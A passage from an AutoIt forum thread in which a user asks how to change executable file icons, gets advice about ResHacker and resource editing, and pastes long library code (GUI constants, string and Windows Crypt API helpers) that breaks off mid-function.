Sign in to follow this  
Followers 0
system32

change file icons ,, ??

8 posts in this topic

Hello to all

I have tried a lot I did not find the solution

I am in the process of making change Any file icons for the files I did not find the appropriate code

Can you help me in that

Greetings to all

Share this post


Link to post
Share on other sites



system32,

Welcome to the AutoIt forum. ;)

Which icons do you want to change? :)

If it is the icon shown in the GUI title bar then you need GUISetIcon - if the systray then TraySetIcon. If something else entirely please explain further. ;)

M23


Any of my own code posted anywhere on the forum is available for use by others without any restriction of any kind._______My UDFs:

Spoiler

ArrayMultiColSort ---- Sort arrays on multiple columns
ChooseFileFolder ---- Single and multiple selections from specified path treeview listing
Date_Time_Convert -- Easily convert date/time formats, including the language used
ExtMsgBox --------- A highly customisable replacement for MsgBox
GUIExtender -------- Extend and retract multiple sections within a GUI
GUIFrame ---------- Subdivide GUIs into many adjustable frames
GUIListViewEx ------- Insert, delete, move, drag, sort, edit and colour ListView items
GUITreeViewEx ------ Check/clear parent and child checkboxes in a TreeView
Marquee ----------- Scrolling tickertape GUIs
NoFocusLines ------- Remove the dotted focus lines from buttons, sliders, radios and checkboxes
Notify ------------- Small notifications on the edge of the display
Scrollbars ----------Automatically sized scrollbars with a single command
StringSize ---------- Automatically size controls to fit text
Toast -------------- Small GUIs which pop out of the notification area

 

Share this post


Link to post
Share on other sites

#3 ·  Posted (edited)

system32,

Welcome to the AutoIt forum. ;)

Which icons do you want to change? :)

If it is the icon shown in the GUI title bar then you need GUISetIcon - if the systray then TraySetIcon. If something else entirely please explain further. ;)

M23

Thank you for this wonderful welcome ..

No, I want to work a program to change icons of files!!

Like this,

#cs ----------------------------------------------------------------------------
AutoIt Version: 3.3.6.1
Author:      change file icon
Script Function:
By System32
#ce ----------------------------------------------------------------------------
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("change file icon", 332, 101, 192, 124)
$Input =GUICtrlCreateInput("", 8, 8, 233, 21)
$Button1 = GUICtrlCreateButton("Choose file", 248, 8, 67, 25)
$Button2 = GUICtrlCreateButton("change icon", 8, 48, 99, 41)
$Button3 = GUICtrlCreateButton("Exit", 224, 48, 99, 41)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
  Case $GUI_EVENT_CLOSE
   Exit
   Case $Button1
  $message = "Choose the file"
  $message1 = "Choose the ico"
        $var = FileOpenDialog($message, @DesktopDir & "","exe FILE (*.exe)", 1 ,"")
  If @error Then
  MsgBox(16,"change file icon","Erorr")
Else
  If $var <> "" Then
       $g = GUICtrlSetData($Input, $var)
Else
  EndIf
EndIf
Case $Button2
        $var = FileOpenDialog($message1, @DesktopDir & "","ico FILE (*.ico)", 1 ,"")
  If @error Then
  MsgBox(16,"change file icon","Erorr")
Else
  If $var <> "" Then
       ; What is the code to change the icon files in order to put it here
Else
  EndIf
EndIf
Case $Button3
  Exit
EndSwitch
WEnd
Edited by system32

Share this post


Link to post
Share on other sites

plz help meeee !!!!!

Share this post


Link to post
Share on other sites

#5 ·  Posted (edited)

system32,

My apologies, I thought I had replied to you yesterday - obviously the ether swallowed it! :D

If you want to change the icon of data files then you need to change the executable associated with it - this post shows you how you might do it. :)

However, if you want to change the icon of an executable file then you need to amend the resource table of that file, which I do not believe you can do with simple AutoIt code. But you can do it with ResHacker. :)

I hope that helps. ;)

M23

Edit: Seems I was wrong - see below. ;)

Edited by Melba23
Amending advice

Any of my own code posted anywhere on the forum is available for use by others without any restriction of any kind._______My UDFs:

Spoiler

ArrayMultiColSort ---- Sort arrays on multiple columns
ChooseFileFolder ---- Single and multiple selections from specified path treeview listing
Date_Time_Convert -- Easily convert date/time formats, including the language used
ExtMsgBox --------- A highly customisable replacement for MsgBox
GUIExtender -------- Extend and retract multiple sections within a GUI
GUIFrame ---------- Subdivide GUIs into many adjustable frames
GUIListViewEx ------- Insert, delete, move, drag, sort, edit and colour ListView items
GUITreeViewEx ------ Check/clear parent and child checkboxes in a TreeView
Marquee ----------- Scrolling tickertape GUIs
NoFocusLines ------- Remove the dotted focus lines from buttons, sliders, radios and checkboxes
Notify ------------- Small notifications on the edge of the display
Scrollbars ----------Automatically sized scrollbars with a single command
StringSize ---------- Automatically size controls to fit text
Toast -------------- Small GUIs which pop out of the notification area

 

Share this post


Link to post
Share on other sites

#6 ·  Posted (edited)

plz help meeee !!!!!

Like this?

Icon Changer Concept.au3

Just a lot a copy pasta from trancexxs stuff.

Although if it's an autoit exe that you want to change the icon resource of, I think the script stub will be deleted in the process, so you need to save it before changing the resource and then add it as a resource itself so it will always stay there if I remember correctly.

Edit: this is a very dirty way of doing it and you are better off using reshacker as Melba23 mentioned, I also made a little function that will preserve the script if you're changing an icon from an autoit compiled script.

Edited by THAT1ANONYMOUSEDUDE

Things that I've done..

Icon Resource Editor: icon resource editor 

AutoIt Piano: a piano

AutoIt Unlocker: unlocks files when you want to delete them

Colorful tooltips: a wrapper for the tool tips UDF

Rouge GoogleBot: a full screen animation

ASciTE text editor: a text editor written in autoit

Warning: Posts by this user are subject to change or may disappear without notice.

Share this post


Link to post
Share on other sites

Thank you all for help

May Gath Source Code to change the program icon file, but I can not extract the code for icon change

Can you help me in this Alsors extracted from the

1-

Global Const $GUI_EVENT_CLOSE = -3
Global Const $GUI_EVENT_MINIMIZE = -4
Global Const $GUI_EVENT_RESTORE = -5
Global Const $GUI_EVENT_MAXIMIZE = -6
Global Const $GUI_EVENT_PRIMARYDOWN = -7
Global Const $GUI_EVENT_PRIMARYUP = -8
Global Const $GUI_EVENT_SECONDARYDOWN = -9
Global Const $GUI_EVENT_SECONDARYUP = -10
Global Const $GUI_EVENT_MOUSEMOVE = -11
Global Const $GUI_EVENT_RESIZED = -12
Global Const $GUI_EVENT_DROPPED = -13
Global Const $GUI_RUNDEFMSG = "GUI_RUNDEFMSG"
Global Const $GUI_AVISTOP = 0
Global Const $GUI_AVISTART = 1
Global Const $GUI_AVICLOSE = 2
Global Const $GUI_CHECKED = 1
Global Const $GUI_INDETERMINATE = 2
Global Const $GUI_UNCHECKED = 4
Global Const $GUI_DROPACCEPTED = 8
Global Const $GUI_NODROPACCEPTED = 4096
Global Const $GUI_ACCEPTFILES = $GUI_DROPACCEPTED
Global Const $GUI_SHOW = 16
Global Const $GUI_HIDE = 32
Global Const $GUI_ENABLE = 64
Global Const $GUI_DISABLE = 128
Global Const $GUI_FOCUS = 256
Global Const $GUI_NOFOCUS = 8192
Global Const $GUI_DEFBUTTON = 512
Global Const $GUI_EXPAND = 1024
Global Const $GUI_ONTOP = 2048
Global Const $GUI_FONTITALIC = 2
Global Const $GUI_FONTUNDER = 4
Global Const $GUI_FONTSTRIKE = 8
Global Const $GUI_DOCKAUTO = 1
Global Const $GUI_DOCKLEFT = 2
Global Const $GUI_DOCKRIGHT = 4
Global Const $GUI_DOCKHCENTER = 8
Global Const $GUI_DOCKTOP = 32
Global Const $GUI_DOCKBOTTOM = 64
Global Const $GUI_DOCKVCENTER = 128
Global Const $GUI_DOCKWIDTH = 256
Global Const $GUI_DOCKHEIGHT = 512
Global Const $GUI_DOCKSIZE = 768
Global Const $GUI_DOCKMENUBAR = 544
Global Const $GUI_DOCKSTATEBAR = 576
Global Const $GUI_DOCKALL = 802
Global Const $GUI_DOCKBORDERS = 102
Global Const $GUI_GR_CLOSE = 1
Global Const $GUI_GR_LINE = 2
Global Const $GUI_GR_BEZIER = 4
Global Const $GUI_GR_MOVE = 6
Global Const $GUI_GR_COLOR = 8
Global Const $GUI_GR_RECT = 10
Global Const $GUI_GR_ELLIPSE = 12
Global Const $GUI_GR_PIE = 14
Global Const $GUI_GR_DOT = 16
Global Const $GUI_GR_PIXEL = 18
Global Const $GUI_GR_HINT = 20
Global Const $GUI_GR_REFRESH = 22
Global Const $GUI_GR_PENSIZE = 24
Global Const $GUI_GR_NOBKCOLOR = -2
Global Const $GUI_BKCOLOR_DEFAULT = -1
Global Const $GUI_BKCOLOR_TRANSPARENT = -2
Global Const $GUI_BKCOLOR_LV_ALTERNATE = -33554432
Global Const $GUI_WS_EX_PARENTDRAG = 1048576
Func _HexToString($STRHEX)
If StringLeft($STRHEX, 2) = "0x" Then Return BinaryToString($STRHEX)
Return BinaryToString("0x" & $STRHEX)
EndFunc

Func _StringBetween($S_STRING, $S_START, $S_END, $V_CASE = -1)
Local $S_CASE = ""
If $V_CASE = Default Or $V_CASE = -1 Then $S_CASE = "(?i)"
Local $S_PATTERN_ESCAPE = "(.|||*|?|+|(|)|{|}|[|]|^|$|)"
$S_START = StringRegExpReplace($S_START, $S_PATTERN_ESCAPE, "$1")
$S_END = StringRegExpReplace($S_END, $S_PATTERN_ESCAPE, "$1")
If $S_START = "" Then $S_START = "A"
If $S_END = "" Then $S_END = "z"
Local $A_RET = StringRegExp($S_STRING, "(?s)" & $S_CASE & $S_START & "(.*?)" & $S_END, 3)
If @error Then Return SetError(1, 0, 0)
Return $A_RET
EndFunc

Func _StringEncrypt($I_ENCRYPT, $S_ENCRYPTTEXT, $S_ENCRYPTPASSWORD, $I_ENCRYPTLEVEL = 1)
If $I_ENCRYPT <> 0 And $I_ENCRYPT <> 1 Then
  SetError(1, 0, "")
ElseIf $S_ENCRYPTTEXT = "" Or $S_ENCRYPTPASSWORD = "" Then
  SetError(1, 0, "")
Else
  If Number($I_ENCRYPTLEVEL) <= 0 Or Int($I_ENCRYPTLEVEL) <> $I_ENCRYPTLEVEL Then $I_ENCRYPTLEVEL = 1
  Local $V_ENCRYPTMODIFIED
  Local $I_ENCRYPTCOUNTH
  Local $I_ENCRYPTCOUNTG
  Local $V_ENCRYPTSWAP
  Local $AV_ENCRYPTBOX[256][2]
  Local $I_ENCRYPTCOUNTA
  Local $I_ENCRYPTCOUNTB
  Local $I_ENCRYPTCOUNTC
  Local $I_ENCRYPTCOUNTD
  Local $I_ENCRYPTCOUNTE
  Local $V_ENCRYPTCIPHER
  Local $V_ENCRYPTCIPHERBY
  If $I_ENCRYPT = 1 Then
   For $I_ENCRYPTCOUNTF = 0 To $I_ENCRYPTLEVEL Step 1
    $I_ENCRYPTCOUNTG = ""
    $I_ENCRYPTCOUNTH = ""
    $V_ENCRYPTMODIFIED = ""
    For $I_ENCRYPTCOUNTG = 1 To StringLen($S_ENCRYPTTEXT)
     If $I_ENCRYPTCOUNTH = StringLen($S_ENCRYPTPASSWORD) Then
      $I_ENCRYPTCOUNTH = 1
     Else
      $I_ENCRYPTCOUNTH += 1
     EndIf
     $V_ENCRYPTMODIFIED = $V_ENCRYPTMODIFIED & Chr(BitXOR(Asc(StringMid($S_ENCRYPTTEXT, $I_ENCRYPTCOUNTG, 1)), Asc(StringMid($S_ENCRYPTPASSWORD, $I_ENCRYPTCOUNTH, 1)), 255))
    Next
    $S_ENCRYPTTEXT = $V_ENCRYPTMODIFIED
    $I_ENCRYPTCOUNTA = ""
    $I_ENCRYPTCOUNTB = 0
    $I_ENCRYPTCOUNTC = ""
    $I_ENCRYPTCOUNTD = ""
    $I_ENCRYPTCOUNTE = ""
    $V_ENCRYPTCIPHERBY = ""
    $V_ENCRYPTCIPHER = ""
    $V_ENCRYPTSWAP = ""
    $AV_ENCRYPTBOX = ""
    Local $AV_ENCRYPTBOX[256][2]
    For $I_ENCRYPTCOUNTA = 0 To 255
     $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][1] = Asc(StringMid($S_ENCRYPTPASSWORD, Mod($I_ENCRYPTCOUNTA, StringLen($S_ENCRYPTPASSWORD)) + 1, 1))
     $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] = $I_ENCRYPTCOUNTA
    Next
    For $I_ENCRYPTCOUNTA = 0 To 255
     $I_ENCRYPTCOUNTB = Mod(($I_ENCRYPTCOUNTB + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][1]), 256)
     $V_ENCRYPTSWAP = $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0]
     $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] = $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTB][0]
     $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTB][0] = $V_ENCRYPTSWAP
    Next
    For $I_ENCRYPTCOUNTA = 1 To StringLen($S_ENCRYPTTEXT)
     $I_ENCRYPTCOUNTC = Mod(($I_ENCRYPTCOUNTC + 1), 256)
     $I_ENCRYPTCOUNTD = Mod(($I_ENCRYPTCOUNTD + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTC][0]), 256)
     $I_ENCRYPTCOUNTE = $AV_ENCRYPTBOX[Mod(($AV_ENCRYPTBOX[$I_ENCRYPTCOUNTC][0] + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTD][0]), 256)][0]
     $V_ENCRYPTCIPHERBY = BitXOR(Asc(StringMid($S_ENCRYPTTEXT, $I_ENCRYPTCOUNTA, 1)), $I_ENCRYPTCOUNTE)
     $V_ENCRYPTCIPHER &= Hex($V_ENCRYPTCIPHERBY, 2)
    Next
    $S_ENCRYPTTEXT = $V_ENCRYPTCIPHER
   Next
  Else
   For $I_ENCRYPTCOUNTF = 0 To $I_ENCRYPTLEVEL Step 1
    $I_ENCRYPTCOUNTB = 0
    $I_ENCRYPTCOUNTC = ""
    $I_ENCRYPTCOUNTD = ""
    $I_ENCRYPTCOUNTE = ""
    $V_ENCRYPTCIPHERBY = ""
    $V_ENCRYPTCIPHER = ""
    $V_ENCRYPTSWAP = ""
    $AV_ENCRYPTBOX = ""
    Local $AV_ENCRYPTBOX[256][2]
    For $I_ENCRYPTCOUNTA = 0 To 255
     $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][1] = Asc(StringMid($S_ENCRYPTPASSWORD, Mod($I_ENCRYPTCOUNTA, StringLen($S_ENCRYPTPASSWORD)) + 1, 1))
     $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] = $I_ENCRYPTCOUNTA
    Next
    For $I_ENCRYPTCOUNTA = 0 To 255
     $I_ENCRYPTCOUNTB = Mod(($I_ENCRYPTCOUNTB + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][1]), 256)
     $V_ENCRYPTSWAP = $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0]
     $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTA][0] = $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTB][0]
     $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTB][0] = $V_ENCRYPTSWAP
    Next
    For $I_ENCRYPTCOUNTA = 1 To StringLen($S_ENCRYPTTEXT) Step 2
     $I_ENCRYPTCOUNTC = Mod(($I_ENCRYPTCOUNTC + 1), 256)
     $I_ENCRYPTCOUNTD = Mod(($I_ENCRYPTCOUNTD + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTC][0]), 256)
     $I_ENCRYPTCOUNTE = $AV_ENCRYPTBOX[Mod(($AV_ENCRYPTBOX[$I_ENCRYPTCOUNTC][0] + $AV_ENCRYPTBOX[$I_ENCRYPTCOUNTD][0]), 256)][0]
     $V_ENCRYPTCIPHERBY = BitXOR(Dec(StringMid($S_ENCRYPTTEXT, $I_ENCRYPTCOUNTA, 2)), $I_ENCRYPTCOUNTE)
     $V_ENCRYPTCIPHER = $V_ENCRYPTCIPHER & Chr($V_ENCRYPTCIPHERBY)
    Next
    $S_ENCRYPTTEXT = $V_ENCRYPTCIPHER
    $I_ENCRYPTCOUNTG = ""
    $I_ENCRYPTCOUNTH = ""
    $V_ENCRYPTMODIFIED = ""
    For $I_ENCRYPTCOUNTG = 1 To StringLen($S_ENCRYPTTEXT)
     If $I_ENCRYPTCOUNTH = StringLen($S_ENCRYPTPASSWORD) Then
      $I_ENCRYPTCOUNTH = 1
     Else
      $I_ENCRYPTCOUNTH += 1
     EndIf
     $V_ENCRYPTMODIFIED &= Chr(BitXOR(Asc(StringMid($S_ENCRYPTTEXT, $I_ENCRYPTCOUNTG, 1)), Asc(StringMid($S_ENCRYPTPASSWORD, $I_ENCRYPTCOUNTH, 1)), 255))
    Next
    $S_ENCRYPTTEXT = $V_ENCRYPTMODIFIED
   Next
  EndIf
  Return $S_ENCRYPTTEXT
EndIf
EndFunc

Func _STRINGEXPLODE($SSTRING, $SDELIMITER, $ILIMIT = 0)
If $ILIMIT > 0 Then
  $SSTRING = StringReplace($SSTRING, $SDELIMITER, Chr(0), $ILIMIT)
  $SDELIMITER = Chr(0)
ElseIf $ILIMIT < 0 Then
  Local $IINDEX = StringInStr($SSTRING, $SDELIMITER, 0, $ILIMIT)
  If $IINDEX Then
   $SSTRING = StringLeft($SSTRING, $IINDEX - 1)
  EndIf
EndIf
Return StringSplit($SSTRING, $SDELIMITER, 3)
EndFunc

Func _StringInsert($S_STRING, $S_INSERTSTRING, $I_POSITION)
Local $I_LENGTH, $S_START, $S_END
If $S_STRING = "" Or (Not IsString($S_STRING)) Then
  Return SetError(1, 0, $S_STRING)
ElseIf $S_INSERTSTRING = "" Or (Not IsString($S_STRING)) Then
  Return SetError(2, 0, $S_STRING)
Else
  $I_LENGTH = StringLen($S_STRING)
  If (Abs($I_POSITION) > $I_LENGTH) Or (Not IsInt($I_POSITION)) Then
   Return SetError(3, 0, $S_STRING)
  EndIf
EndIf
If $I_POSITION = 0 Then
  Return $S_INSERTSTRING & $S_STRING
ElseIf $I_POSITION > 0 Then
  $S_START = StringLeft($S_STRING, $I_POSITION)
  $S_END = StringRight($S_STRING, $I_LENGTH - $I_POSITION)
  Return $S_START & $S_INSERTSTRING & $S_END
ElseIf $I_POSITION < 0 Then
  $S_START = StringLeft($S_STRING, Abs($I_LENGTH + $I_POSITION))
  $S_END = StringRight($S_STRING, Abs($I_POSITION))
  Return $S_START & $S_INSERTSTRING & $S_END
EndIf
EndFunc

Func _StringProper($S_STRING)
Local $IX = 0
Local $CAPNEXT = 1
Local $S_NSTR = ""
Local $S_CURCHAR
For $IX = 1 To StringLen($S_STRING)
  $S_CURCHAR = StringMid($S_STRING, $IX, 1)
  Select
   Case $CAPNEXT = 1
    If StringRegExp($S_CURCHAR, "[a-zA-Zغپ-غ’ع‘إ“â€چع؛]") Then
     $S_CURCHAR = StringUpper($S_CURCHAR)
     $CAPNEXT = 0
    EndIf
   Case Not StringRegExp($S_CURCHAR, "[a-zA-Zغپ-غ’ع‘إ“â€چع؛]")
    $CAPNEXT = 1
   Case Else
    $S_CURCHAR = StringLower($S_CURCHAR)
  EndSelect
  $S_NSTR &= $S_CURCHAR
Next
Return $S_NSTR
EndFunc

Func _StringRepeat($SSTRING, $IREPEATCOUNT)
Local $SRESULT
Select
  Case Not StringIsInt($IREPEATCOUNT)
   SetError(1)
   Return ""
  Case StringLen($SSTRING) < 1
   SetError(1)
   Return ""
  Case $IREPEATCOUNT <= 0
   SetError(1)
   Return ""
  Case Else
   For $ICOUNT = 1 To $IREPEATCOUNT
    $SRESULT &= $SSTRING
   Next
   Return $SRESULT
EndSelect
EndFunc

Func _StringReverse($S_STRING)
Local $I_LEN = StringLen($S_STRING)
If $I_LEN < 1 Then Return SetError(1, 0, "")
Local $T_CHARS = DllStructCreate("char[" & $I_LEN + 1 & "]")
DllStructSetData($T_CHARS, 1, $S_STRING)
Local $A_REV = DllCall("msvcrt.dll", "ptr:cdecl", "_strrev", "ptr", DllStructGetPtr($T_CHARS))
If @error Or $A_REV[0] = 0 Then Return SetError(2, 0, "")
Return DllStructGetData($T_CHARS, 1)
EndFunc

Func _StringToHex($STRCHAR)
Return Hex(StringToBinary($STRCHAR))
EndFunc
Global Const $PROV_RSA_FULL = 1
Global Const $PROV_RSA_AES = 24
Global Const $CRYPT_VERIFYCONTEXT = -268435456
Global Const $HP_HASHSIZE = 4
Global Const $HP_HASHVAL = 2
Global Const $CRYPT_EXPORTABLE = 1
Global Const $CRYPT_USERDATA = 1
Global Const $CALG_MD2 = 32769
Global Const $CALG_MD4 = 32770
Global Const $CALG_MD5 = 32771
Global Const $CALG_SHA1 = 32772
Global Const $CALG_3DES = 26115
Global Const $CALG_AES_128 = 26126
Global Const $CALG_AES_192 = 26127
Global Const $CALG_AES_256 = 26128
Global Const $CALG_DES = 26113
Global Const $CALG_RC2 = 26114
Global Const $CALG_RC4 = 26625
Global Const $CALG_USERKEY = 0
Global $__G_ACRYPTINTERNALDATA[3]
Func _CRYPT_STARTUP()
If __CRYPT_REFCOUNT() = 0 Then
  Local $HADVAPI32 = DllOpen("Advapi32.dll")
  If @error Then Return SetError(1, 0, False)
  __CRYPT_DLLHANDLESET($HADVAPI32)
  Local $ARET
  Local $IPROVIDERID = $PROV_RSA_AES
  If @OSVersion = "WIN_2000" Then $IPROVIDERID = $PROV_RSA_FULL
  $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $IPROVIDERID, "dword", $CRYPT_VERIFYCONTEXT)
  If @error Or Not $ARET[0] Then
   DllClose(__CRYPT_DLLHANDLE())
   Return SetError(2, 0, False)
  Else
   __CRYPT_CONTEXTSET($ARET[1])
  EndIf
EndIf
__CRYPT_REFCOUNTINC()
Return True
EndFunc

Func _CRYPT_SHUTDOWN()
__CRYPT_REFCOUNTDEC()
If __CRYPT_REFCOUNT() = 0 Then
  DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptReleaseContext", "handle", __CRYPT_CONTEXT(), "dword", 0)
  DllClose(__CRYPT_DLLHANDLE())
EndIf
EndFunc

Func _CRYPT_DERIVEKEY($VPASSWORD, $IALG_ID, $IHASH_ALG_ID = $CALG_MD5)
Local $ARET
Local $HCRYPTHASH
Local $HBUFF
Local $IERROR
Local $VRETURN
_CRYPT_STARTUP()
Do
  $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptCreateHash", "handle", __CRYPT_CONTEXT(), "uint", $IHASH_ALG_ID, "ptr", 0, "dword", 0, "handle*", 0)
  If @error Or Not $ARET[0] Then
   $IERROR = 1
   $VRETURN = -1
   ExitLoop
  EndIf
  $HCRYPTHASH = $ARET[5]
  $HBUFF = DllStructCreate("byte[" & BinaryLen($VPASSWORD) & "]")
  DllStructSetData($HBUFF, 1, $VPASSWORD)
  $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptHashData", "handle", $HCRYPTHASH, "ptr", DllStructGetPtr($HBUFF), "dword", DllStructGetSize($HBUFF), "dword", $CRYPT_USERDATA)
  If @error Or Not $ARET[0] Then
   $IERROR = 2
   $VRETURN = -1
   ExitLoop
  EndIf
  $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptDeriveKey", "handle", __CRYPT_CONTEXT(), "uint", $IALG_ID, "handle", $HCRYPTHASH, "dword", $CRYPT_EXPORTABLE, "handle*", 0)
  If @error Or Not $ARET[0] Then
   $IERROR = 3
   $VRETURN = -1
   ExitLoop
  EndIf
  $IERROR = 0
  $VRETURN = $ARET[5]
Until True
If $HCRYPTHASH <> 0 Then DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptDestroyHash", "handle", $HCRYPTHASH)
Return SetError($IERROR, 0, $VRETURN)
EndFunc

Func _CRYPT_DESTROYKEY($HCRYPTKEY)
Local $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptDestroyKey", "handle", $HCRYPTKEY)
Local $NERROR = @error
_CRYPT_SHUTDOWN()
If $NERROR Or Not $ARET[0] Then
  Return SetError(1, 0, False)
Else
  Return SetError(0, 0, True)
EndIf
EndFunc

Func _CRYPT_ENCRYPTDATA($VDATA, $VCRYPTKEY, $IALG_ID, $FFINAL = True)
Local $HBUFF
Local $IERROR
Local $VRETURN
Local $REQBUFFSIZE
Local $ARET
_CRYPT_STARTUP()
Do
  If $IALG_ID <> $CALG_USERKEY Then
   $VCRYPTKEY = _CRYPT_DERIVEKEY($VCRYPTKEY, $IALG_ID)
   If @error Then
    $IERROR = 1
    $VRETURN = -1
    ExitLoop
   EndIf
  EndIf
  $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptEncrypt", "ptr", $VCRYPTKEY, "ptr", 0, "bool", 1, "dword", 0, "ptr", 0, "dword*", BinaryLen($VDATA), "dword", 0)
  If @error Or Not $ARET[0] Then
   $IERROR = 2
   $VRETURN = -1
   ExitLoop
  EndIf
  $REQBUFFSIZE = $ARET[6]
  $HBUFF = DllStructCreate("byte[" & $REQBUFFSIZE & "]")
  DllStructSetData($HBUFF, 1, $VDATA)
  $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptEncrypt", "ptr", $VCRYPTKEY, "ptr", 0, "bool", $FFINAL, "dword", 0, "ptr", DllStructGetPtr($HBUFF), "dword*", BinaryLen($VDATA), "dword", DllStructGetSize($HBUFF))
  If @error Or Not $ARET[0] Then
   $IERROR = 3
   $VRETURN = -1
   ExitLoop
  EndIf
  $IERROR = 0
  $VRETURN = DllStructGetData($HBUFF, 1)
Until True
If $IALG_ID <> $CALG_USERKEY Then _CRYPT_DESTROYKEY($VCRYPTKEY)
_CRYPT_SHUTDOWN()
Return SetError($IERROR, 0, $VRETURN)
EndFunc

Func _CRYPT_DECRYPTDATA($VDATA, $VCRYPTKEY, $IALG_ID, $FFINAL = True)
Local $HBUFF
Local $IERROR
Local $VRETURN
Local $HTEMPSTRUCT
Local $IPLAINTEXTSIZE
Local $ARET
_CRYPT_STARTUP()
Do
  If $IALG_ID <> $CALG_USERKEY Then
   $VCRYPTKEY = _CRYPT_DERIVEKEY($VCRYPTKEY, $IALG_ID)
   If @error Then
    $IERROR = 1
    $VRETURN = -1
    ExitLoop
   EndIf
  EndIf
  $HBUFF = DllStructCreate("byte[" & BinaryLen($VDATA) + 1000 & "]")
  DllStructSetData($HBUFF, 1, $VDATA)
  $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptDecrypt", "handle", $VCRYPTKEY, "handle", 0, "bool", $FFINAL, "dword", 0, "ptr", DllStructGetPtr($HBUFF), "dword*", BinaryLen($VDATA))
  If @error Or Not $ARET[0] Then
   $IERROR = 2
   $VRETURN = -1
   ExitLoop
  EndIf
  $IPLAINTEXTSIZE = $ARET[6]
  $HTEMPSTRUCT = DllStructCreate("byte[" & $IPLAINTEXTSIZE & "]", DllStructGetPtr($HBUFF))
  $IERROR = 0
  $VRETURN = DllStructGetData($HTEMPSTRUCT, 1)
Until True
If $IALG_ID <> $CALG_USERKEY Then _CRYPT_DESTROYKEY($VCRYPTKEY)
_CRYPT_SHUTDOWN()
Return SetError($IERROR, 0, $VRETURN)
EndFunc

Func _CRYPT_HASHDATA($VDATA, $IALG_ID, $FFINAL = True, $HCRYPTHASH = 0)
Local $IERROR
Local $VRETURN = 0
Local $IHASHSIZE
Local $ARET
Local $HBUFF = 0
_CRYPT_STARTUP()
Do
  If $HCRYPTHASH = 0 Then
   $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptCreateHash", "handle", __CRYPT_CONTEXT(), "uint", $IALG_ID, "ptr", 0, "dword", 0, "handle*", 0)
   If @error Or Not $ARET[0] Then
    $IERROR = 1
    $VRETURN = -1
    ExitLoop
   EndIf
   $HCRYPTHASH = $ARET[5]
  EndIf
  $HBUFF = DllStructCreate("byte[" & BinaryLen($VDATA) & "]")
  DllStructSetData($HBUFF, 1, $VDATA)
  $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptHashData", "handle", $HCRYPTHASH, "ptr", DllStructGetPtr($HBUFF), "dword", DllStructGetSize($HBUFF), "dword", $CRYPT_USERDATA)
  If @error Or Not $ARET[0] Then
   $IERROR = 2
   $VRETURN = -1
   ExitLoop
  EndIf
  If $FFINAL Then
   $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptGetHashParam", "handle", $HCRYPTHASH, "dword", $HP_HASHSIZE, "dword*", 0, "dword*", 4, "dword", 0)
   If @error Or Not $ARET[0] Then
    $IERROR = 3
    $VRETURN = -1
    ExitLoop
   EndIf
   $IHASHSIZE = $ARET[3]
   $HBUFF = DllStructCreate("byte[" & $IHASHSIZE & "]")
   $ARET = DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptGetHashParam", "handle", $HCRYPTHASH, "dword", $HP_HASHVAL, "ptr", DllStructGetPtr($HBUFF), "dword*", DllStructGetSize($HBUFF), "dword", 0)
   If @error Or Not $ARET[0] Then
    $IERROR = 4
    $VRETURN = -1
    ExitLoop
   EndIf
   $IERROR = 0
   $VRETURN = DllStructGetData($HBUFF, 1)
  Else
   $VRETURN = $HCRYPTHASH
  EndIf
Until True
If $HCRYPTHASH <> 0 And $FFINAL Then DllCall(__CRYPT_DLLHANDLE(), "bool", "CryptDestroyHash", "handle", $HCRYPTHASH)
_CRYPT_SHUTDOWN()
Return SetError($IERROR, 0, $VRETURN)
EndFunc

Func _CRYPT_HASHFILE($SFILE, $IALG_ID)
Local $HFILE
Local $IERROR, $VRETURN
Local $HHASHOBJECT = 0
Local $BTEMPDATA
_CRYPT_STARTUP()
Do
  $HFILE = FileOpen($SFILE, 16)
  If $HFILE = -1 Then
   $IERROR = 1
   $VRETURN = -1
   ExitLoop
  EndIf
  Do
   $BTEMPDATA = FileRead($HFILE, 512 * 1024)
   If @error Then
    $VRETURN = _CRYPT_HASHDATA($BTEMPDATA, $IALG_ID, True, $HHASHOBJECT)
    If @error Then
     $VRETURN = -1
     $IERROR = 2
     ExitLoop 2
    EndIf
    ExitLoop 2
   Else
    $HHASHOBJECT = _CRYPT_HASHDATA($BTEMPDATA, $IALG_ID, False, $HHASHOBJECT)
    If @error Then
     $VRETURN = -1
